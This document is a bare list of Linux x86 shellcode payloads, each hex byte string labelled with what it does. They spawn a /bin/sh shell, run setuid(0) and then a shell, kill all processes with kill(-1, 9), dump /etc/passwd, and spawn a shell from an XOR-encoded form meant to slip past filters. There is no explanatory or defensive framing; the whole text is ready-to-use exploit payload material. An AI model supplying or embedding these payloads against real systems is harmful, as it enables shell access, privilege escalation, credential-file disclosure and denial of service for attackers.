execve('//bin/sh', 0, 0);
\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x05\x5b\xb0\x0b\xcd\x80\xe8\xf6\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68

exit(1); 
\x31\xc0\x31\xdb\x40\x88\xc3\xcd\x80

kill(-1, 9);
\x31\xc0\x31\xdb\x31\xc9\x6a\x25\x58\x6a\xff\x5b\x6a\x09\x59\xcd\x80

execve('/bin/cat', '/etc//passwd', 0); exit(1); 
\x6a\x0b\x58\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x31\xd2\xcd\x80\x31\xc0\x40\x31\xdb\xcd\x80

setuid(0); execve('/bin//sh', 0, 0); 
\x6a\x17\x58\x31\xdb\xcd\x80\x31\xc0\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80

xored execve('//bin/sh', 0, 0); key:4 
\xeb\x0f\x5e\x31\xc0\x38\x06\x74\x0d\x83\x36\x04\x83\xc6\x01\xeb\xf4\xe8\xec\xff\xff\xff\x35\xc4\x35\xdf\x35\xcd\x35\xd6\xef\x01\x5f\xb4\x0f\xc9\x84\xec\xf2\xfb\xfb\xfb\x2b\x2b\x66\x6d\x6a\x2b\x77\x6c
